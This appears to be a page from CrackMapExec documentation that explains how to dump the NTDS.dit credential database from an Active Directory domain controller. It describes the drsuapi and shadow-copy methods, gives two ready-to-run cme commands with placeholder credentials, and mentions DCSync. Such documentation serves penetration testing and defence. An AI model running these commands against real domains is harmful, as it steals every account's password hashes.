Dump NTDS.dit

Dump the NTDS.dit from target DC using methods from secretsdump.py

Requires Domain Admin or Local Admin Priviledges on target Domain Controller
1
2 methods are available:
2
(default) drsuapi - Uses drsuapi RPC interface create a handle, trigger replication, and combined with
3
additional drsuapi calls to convert the resultant linked-lists into readable format
4
vss - Uses the Volume Shadow copy Service
Copied!
1
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
2
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss
Copied!
You can also DCSYNC with the computer account of the DC
Remember to play this music everytime you got DA
Last modified 5mo ago
Copy link